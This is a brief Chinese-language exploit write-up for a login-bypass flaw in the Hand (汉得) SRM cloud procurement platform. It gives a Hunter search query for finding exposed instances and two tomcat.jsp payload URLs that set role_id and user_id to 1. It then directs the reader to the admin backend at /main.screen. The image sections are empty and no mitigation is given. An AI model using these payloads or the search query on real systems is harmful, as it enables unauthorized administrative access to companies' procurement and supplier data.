H8-1汉得-SRM云-PermissionAC

漏洞描述：

汉得SRM云是面向企业采购流程信息化建设的完整解决方案。基于汉得供应商关系管理体系在战略寻源与集中采购、供应链协同和优益采购三大采购管理领域的成功实践，形成了深度契合业务实体的三项组件级解决方案。汉得SRM tomcat.jsp 存在登录绕过漏洞，可绕过身份认证登录后台。

网站图片:

网络测绘:

Hunter 语法:

• hunter：app.name=“汉得 SRM Going-Link”

漏洞复现:

1. 访问tomct.jsp

payload：

/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1

效果图:


然后访问后台/main.screen